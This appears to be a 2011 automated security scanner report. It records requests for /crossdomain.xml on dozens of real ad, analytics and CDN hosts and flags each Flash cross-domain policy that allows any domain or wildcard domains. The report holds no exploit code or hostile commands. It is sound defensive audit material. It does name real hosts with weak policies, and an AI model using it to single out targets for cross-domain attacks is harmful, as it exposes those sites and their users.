GET /crossdomain.xml HTTP/1.0 Host: cdn.royale.spongecell.com
Response
HTTP/1.0 200 OK Server: nginx/0.6.35 Content-Type: text/xml Content-Length: 325 Vary: Accept-Encoding Accept-Ranges: bytes Date: Sat, 05 Feb 2011 22:46:28 GMT Last-Modified: Fri, 06 Aug 2010 01:11:11 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: cdn.w55c.net
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 21:49:03 GMT Server: Jetty(6.1.22) Cache-Control: max-age=86400 Content-Length: 504 content-type: application/xml Age: 0 Via: 1.1 mdw061004 (MII-APC/1.6) Connection: close
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy>
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: cdn.widgets.spongecell.com Proxy-Connection: keep-alive Referer: http://cdn.statics.live.spongecell.com/officedepot/r2/v4b/bin/RectangleGrid.swf?placementId=&flightId=&clickthroughUrl=http%3A%2F%2Fwww.officedepot.com%2F%3Fcm_mmc%3DRetail-_-Q1ITP2011%2BOwnerIQ-_-OwnerIQOwnerandIntenderGroup300x250-_-300x250&actionsType=Rectangle&backupImageUrl=http%3A%2F%2Fcdn.statics.live.spongecell.com%2Fofficedepot%2Fv4b%2Fassets%2F300x250.jpg&hostBaseUrl=spongecell.com&creativeSwfUrl=..%2Fassets%2F300x250.swf&subMenuType=Pop&menuType=Grid&height=250&widgetId=263365&trackImpressions=0&width=300&linkPrefixDecoded=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/g%3B234541768%3B0-0%3B0%3B58231430%3B4307-300/250%3B40051907/40069694/1%3Bu%3Dsid_%3B%7Eokv%3D%3Bpc%3DDFP235949442%3B%3B%7Efdr%3D235949442%3B0-0%3B0%3B41185174%3B4307-300/250%3B40069735/40087522/1%3Bu%3Dsid_%3B%7Esscs%3D%3f&clickTag=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/g%3B234541768%3B0-0%3B0%3B58231430%3B4307-300/250%3B40051907/40069694/1%3Bu%3Dsid_%3B%7Eokv%3D%3Bpc%3DDFP235949442%3B%3B%7Efdr%3D235949442%3B0-0%3B0%3B41185174%3B4307-300/250%3B40069735/40087522/1%3Bu%3Dsid_%3B%7Esscs%3D%3fhttp%3A//www.officedepot.com/%3Fcm_mmc%3DRetail-_-Q1ITP2011+OwnerIQ-_-OwnerIQOwnerandIntenderGroup300x250-_-300x250&clickTag1=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/g%3B234541768%3B0-0%3B0%3B58231430%3B4307-300/250%3B40051907/40069694/1%3Bu%3Dsid_%3B%7Eokv%3D%3Bpc%3DDFP235949442%3B%3B%7Efdr%3D235949442%3B0-0%3B0%3B41185174%3B4307-300/250%3B40069735/40087522/1%3Bu%3Dsid_%3B%7Esscs%3D%3fhttp%3A//www.officedepot.com/promo/list5.do%3Flisttype%3DAY%3Fcm_mmc%3DRetail-_-Q1ITP2011+OwnerIQ-_-OwnerIQOwnerandIntenderGroup300x250-_-300x250&clickTag2=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/g%3B234541768%3B0-0%3B0%3B58231430%3B4307-300/250%3B40051907/40069694/1%3Bu%3Dsid_%3B%7Eokv%3D%3Bpc%3DDFP235949442%3B%3B%7Efdr%3D235949442%3B0-0%3B0%3B41185174%3B4307-300/250%3B40069735/40087522/1%3Bu%3Dsid_%3B%7Esscs%3D%3fhttp%3A//officedepot.shoplocal.com/officedepot%3Fcm_mmc%3DRetail-_-Q1ITP2011+OwnerIQ-_-OwnerIQOwnerandIntenderGroup300x250-_-300x250&clickTag3=http://ad.doubleclick.net/click%3Bh%3Dv8/3aa5/3/0/%2a/g%3B234541768%3B0-0%3B0%3B58231430%3B4307-300/250%3B40051907/40069694/1%3Bu%3Dsid_%3B%7Eokv%3D%3Bpc%3DDFP235949442%3B%3B%7Efdr%3D235949442%3B0-0%3B0%3B41185174%3B4307-300/250%3B40069735/40087522/1%3Bu%3Dsid_%3B%7Esscs%3D%3fhttp%3A//cdn.statics.live.spongecell.com/officedepot/v4b/assets/Coupons1.pdf%3Fcm_mmc%3DRetail-_-Q1ITP2011+OwnerIQ-_-OwnerIQOwnerandIntenderGroup300x250-_-300x250& Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: clk.redcated
Response
HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 207 Content-Type: text/xml Last-Modified: Thu, 18 Sep 2003 22:57:15 GMT Accept-Ranges: bytes ETag: "488d2234387ec31:5e1" Connection: close Date: Sat, 05 Feb 2011 22:47:13 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: demos.us.intellitxt.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 02 Mar 2005 18:36:18 GMT Accept-Ranges: bytes ETag: "03debb8561fc51:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 22:47:43 GMT Connection: close Content-Length: 202
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ds.serving-sys.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT Server: Microsoft-IIS/6.0 Date: Sun, 06 Feb 2011 13:21:32 GMT Content-Length: 100 Connection: close Accept-Ranges: bytes
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: eisenstein.dk
Response
HTTP/1.1 200 OK Set-Cookie: ARPT=NQJKKYS192.168.100.209CKOWJ; path=/ Date: Sun, 06 Feb 2011 17:52:46 GMT Server: Apache Last-Modified: Thu, 16 Oct 2008 18:44:17 GMT ETag: "c780a2-66-459633c692240" Accept-Ranges: bytes Content-Length: 102 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: enterprisemediagroup.112.2o7.net
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 13:21:53 GMT Server: Omniture DC/2.0.0 xserver: www92 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: external.ak.fbcdn.net
Response
HTTP/1.0 200 OK Server: Apache ETag: "a27e344a618640558cd334164e432db0:1247617934" Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT Accept-Ranges: bytes Content-Length: 258 Content-Type: application/xml Date: Sun, 06 Feb 2011 13:32:57 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: feeds.feedburner.com
Response
HTTP/1.0 200 OK Expires: Mon, 07 Feb 2011 13:39:12 GMT Date: Sun, 06 Feb 2011 13:39:12 GMT Cache-Control: public, max-age=86400 Content-Type: text/x-cross-domain-policy X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: files.video-loader.com
Response
HTTP/1.0 200 OK Server: Apache ETag: "a004dc-245-4930aee4073c0" Accept-Ranges: bytes Content-Length: 581 Content-Type: text/xml Age: 73114 Date: Sat, 05 Feb 2011 23:07:33 GMT Last-Modified: Wed, 20 Oct 2010 11:44:23 GMT Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.video-loader.com --> <cross-domain-policy> <site-con ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: metrics.blackberry.com
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 13:32:28 GMT Server: Omniture DC/2.0.0 xserver: www276 Content-Length: 167 Keep-Alive: timeout=15 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: metrixlablw.customers.luna.net
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 13:21:20 GMT Server: Apache/2.2.14 (Ubuntu) Last-Modified: Wed, 18 Feb 2009 10:52:39 GMT ETag: "db020b-db-4632f37e1cbc0" Accept-Ranges: bytes Content-Length: 219 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: mittwiki.ivwbox.de
Response
HTTP/1.0 200 OK Server: srp/2ac Date: Sun, 06 Feb 2011 17:43:08 GMT Last-Modified: Tue, 22 Aug 2000 15:05:01 GMT P3P: policyref="http://www.ivwbox.de/p3p.xml", CP="NOI DSP PSAo OUR NOR UNI" Content-Length: 102 Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: platform.ak.fbcdn.net
Response
HTTP/1.0 200 OK Server: Apache ETag: "a27e344a618640558cd334164e432db0:1247617934" Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT Accept-Ranges: bytes Content-Length: 258 Content-Type: application/xml Date: Sun, 06 Feb 2011 13:32:57 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: rt32.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/xml;charset=UTF-8 Content-Length: 82 Date: Sat, 05 Feb 2011 22:15:46 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: rt82.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=1
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/xml;charset=UTF-8 Content-Length: 82 Date: Sat, 05 Feb 2011 22:15:09 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.1 Host: rt83.infolinks.com Proxy-Connection: keep-alive Referer: http://resources.infolinks.com/flash/ic.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cuid=11d77bcd-1e56-4ec4-8f17-60b91b3b6392; cnoi=0
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/xml;charset=UTF-8 Content-Length: 82 Date: Sat, 05 Feb 2011 22:15:00 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: s.ytimg.com
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy Last-Modified: Fri, 27 Aug 2010 02:31:32 GMT Date: Sat, 05 Feb 2011 05:57:04 GMT Expires: Sat, 12 Feb 2011 05:57:04 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=604800 Age: 61319
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: s3.amazonaws.com
Response
HTTP/1.1 200 OK x-amz-id-2: 76E6oj9w+b/hHPZf7UaEFSCi9AaQCW4UuWT+YKdmAw8EG3ShKK171g6nOB9vvB6N x-amz-request-id: 713BC53FB52939CB Date: Sat, 05 Feb 2011 22:59:10 GMT Content-Type: text/xml Connection: close Server: AmazonS3
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false" /></cross-domain-pol ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: spe.redcated
Response
HTTP/1.0 200 OK Content-Type: text/xml Content-Length: 207 Allow: GET Expires: Thu, 10 Feb 2011 19:43:50 GMT Date: Sun, 06 Feb 2011 13:22:29 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: spongecell.com
Response
HTTP/1.1 200 OK Server: nginx/0.6.35 Date: Sat, 05 Feb 2011 23:01:19 GMT Content-Type: text/xml Content-Length: 325 Last-Modified: Fri, 06 Aug 2010 01:11:11 GMT Connection: close Vary: Accept-Encoding Accept-Ranges: bytes
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: us.blackberry.com
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: videos.video-loader.com
Response
HTTP/1.0 200 OK Server: Apache ETag: "a004dc-245-4930aee4073c0" Accept-Ranges: bytes Content-Length: 581 Content-Type: text/xml Age: 55705 Date: Sat, 05 Feb 2011 23:32:46 GMT Last-Modified: Wed, 20 Oct 2010 11:44:23 GMT Connection: close
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.video-loader.com --> <cross-domain-policy> <site-con ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: vodpod.com
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sat, 05 Feb 2011 22:41:50 GMT Content-Type: text/xml Content-Length: 214 Last-Modified: Tue, 06 Oct 2009 19:34:48 GMT Connection: close Vary: Accept-Encoding P3P: policyref="http://facebook.vodpod.com/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Accept-Ranges: bytes
<?xml version="1.0"?> <!-- This file should be copied to the root of all web sites where you want to download/upload files.--> <cross-domain-policy> <allow-access-from domain="*" /> </cross-doma ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.ad4mat.de
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 17:39:38 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8 Last-Modified: Wed, 15 Jul 2009 17:09:21 GMT ETag: "298327-13e-46ec19dbd1240" Accept-Ranges: bytes Content-Length: 318 Connection: close Content-Type: application/xml Set-Cookie: ad4mat_lb=616182620.20480.0000; path=/
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.allvoices.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:42:24 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Fri, 04 Feb 2011 19:44:52 GMT ETag: "20a8484-65-49b7a1d9d3500" Accept-Ranges: bytes Content-Length: 101 Vary: Accept-Encoding Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.au2m8.com
Response
HTTP/1.1 200 OK Set-Cookie: ARPT=NQJKKYS192.168.100.218CKOWJ; path=/ Date: Sat, 05 Feb 2011 23:08:12 GMT Server: Apache Last-Modified: Wed, 03 Dec 2008 12:41:21 GMT ETag: "a80cf-66-45d23c2d7be40" Accept-Ranges: bytes Content-Length: 102 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.baselinemag.com
Response
HTTP/1.1 200 OK Server: nginx/0.7.65 Date: Sat, 05 Feb 2011 23:01:28 GMT Content-Type: text/xml Connection: close Last-Modified: Tue, 30 Mar 2010 15:40:49 GMT ETag: "fe90c5-c5-48306742d2240" Accept-Ranges: bytes Content-Length: 197
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.hemidemi.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:16 GMT Server: Apache/2.2.6 (Unix) PHP/5.2.5 Last-Modified: Sun, 26 Oct 2008 14:31:52 GMT ETag: "c55f42-d0-e01c8600" Accept-Ranges: bytes Content-Length: 208 Vary: Accept-Encoding Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.manualsonline.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:39 GMT Server: Apache/2.2.14 (Fedora) Last-Modified: Wed, 26 Jan 2011 14:52:42 GMT ETag: "2e60d2-ef-49ac0fc2c4280" Accept-Ranges: bytes Content-Length: 239 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.zanox-affiliate.de
Response
HTTP/1.1 200 OK Content-Length: 330 Content-Type: text/xml Last-Modified: Thu, 17 Sep 2009 16:58:09 GMT Accept-Ranges: bytes ETag: "5ed8c08b837ca1:4a9" Server: Microsoft-IIS/6.0 P3P: policyref="http://www.zanox-affiliate.de/w3c/p3p.xml", CP="NOI CUR OUR STP" X-Powered-By: ASP.NET Date: Sun, 06 Feb 2011 17:39:23 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www91.intel.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:36:49 GMT Server: Omniture DC/2.0.0 xserver: www419 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: yasnide.ivwbox.de
Response
HTTP/1.1 200 OK Server: s2.30.1 Date: Sun, 06 Feb 2011 18:25:56 GMT Last-Modified: Tue, 22 Aug 2000 15:05:01 GMT P3P: policyref=http://p3p.infonline.de/p3p.xml, CP=NOI DSP NID PSAa OUR NOR UNI COM NAV Content-Length: 102 Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ziffdavisbaseline.112.2o7.net
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 13:21:31 GMT Server: Omniture DC/2.0.0 xserver: www67 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: a.ligatus.com
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 17:44:12 GMT Server: Apache Last-Modified: Mon, 13 Sep 2010 13:56:24 GMT ETag: "4885ee-71-4902476407200" Accept-Ranges: bytes Content-Type: text/xml Cache-Control: private, max-age=600 Age: 0 Expires: Sun, 06 Feb 2011 17:54:12 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: a.ligatus.de
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 17:43:12 GMT Server: Apache Last-Modified: Mon, 13 Sep 2010 13:56:24 GMT ETag: "4885ee-71-4902476407200" Accept-Ranges: bytes Content-Type: text/xml Cache-Control: private, max-age=600 Age: 0 Expires: Sun, 06 Feb 2011 17:53:12 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: api.tweetmeme.com
Response
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Sun, 06 Feb 2011 13:21:43 GMT Content-Type: text/xml; charset='utf-8' Connection: close P3P: CP="CAO PSA" Expires: Sun, 06 Feb 2011 13:26:43 +0000 GMT Etag: edc33ef1e6bd30dda068b8d6a45f5a7f X-Served-By: ded2062
<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: appcdn.wibiya.com
Response
HTTP/1.0 200 OK Accept-Ranges: bytes Cache-Control: max-age=86400 Content-Type: application/xml Date: Sat, 05 Feb 2011 23:08:11 GMT ETag: "e08d12-142-496438084ba80" Expires: Sun, 06 Feb 2011 23:08:12 GMT Last-Modified: Tue, 30 Nov 2010 11:29:30 GMT Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.4 with Suhosin-Patch Content-Length: 322 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: b.static.ak.fbcdn.net
Response
HTTP/1.0 200 OK Content-Type: text/x-cross-domain-policy;charset=utf-8 X-Cnection: close Date: Sat, 05 Feb 2011 22:44:06 GMT Content-Length: 1581 Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: chitika.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:47:00 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.10 Last-Modified: Fri, 19 Jun 2009 18:59:40 GMT Accept-Ranges: bytes Content-Length: 161 Vary: Accept-Encoding Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
